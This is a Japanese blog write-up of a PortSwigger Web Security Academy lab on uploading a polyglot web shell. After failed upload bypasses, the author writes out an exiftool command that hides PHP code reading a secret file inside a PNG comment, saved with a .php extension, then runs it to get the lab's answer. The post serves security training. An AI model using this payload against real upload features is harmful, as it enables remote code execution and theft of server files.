Shikata Ga Nai

Private? There is no such things.

Remote code execution via polyglot web shell uploadをやってみた

Hello there, ('ω')ノ

 

polyglot webシェルアップロードによるリモートコード実行を。

まずは、ログインして。

 

f:id:ThisIsOne:20220102101936p:plain

 

いつもどおり悪意のあるPHPファイルをアップロードすると。

 

f:id:ThisIsOne:20220102102007p:plain

 

イメージファイルではないとのことで。

 

f:id:ThisIsOne:20220102102022p:plain

 

リピータで、ヌルバイトと拡張子を追加してSendしてみると。

同じく、イメージファイルではないとのことで。

 

f:id:ThisIsOne:20220102102203p:plain

 

とりあえず、ExifToolをダウンロードすることに。

これは、写真や画像やメディアファイルからメタデータを取得したり。

追加したり変更したりできるツールで。

 https://exiftool.jp.uptodown.com/windows/download

 

f:id:ThisIsOne:20220102095339p:plain

 

f:id:ThisIsOne:20220102095552p:plain

 

解凍してあとは、名前をexiftoolにしておいて。

適当な画像ファイルにコメントとしてPHPファイルのコードを追加することに。

'START'と'END'は、位置を特定しやすくするために。

 exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test.png -o polyglot.php

 

f:id:ThisIsOne:20220102101840p:plain

 

画像に悪意のコードを追加したPHPファイルをアップロードすると。

 

f:id:ThisIsOne:20220102102312p:plain

 

画像データとみなして拡張子が.phpでもアップロードできて。

 

f:id:ThisIsOne:20220102102331p:plain

 

アップロードした位置を確認して。

 

f:id:ThisIsOne:20220102102403p:plain

 

直接、URLにアクセスしてみると。

 https://ac7d1f901ea31adac03944b300860092.web-security-academy.net/files/avatars/polyglot.php

 

f:id:ThisIsOne:20220102102530p:plain

 

取得したコードを入力すると、クリアできて。

 mVe9eMTpecNDL0yPbiege4ef5eeVzjLt

 

f:id:ThisIsOne:20220102102607p:plain

 

Best regards, (^^ゞ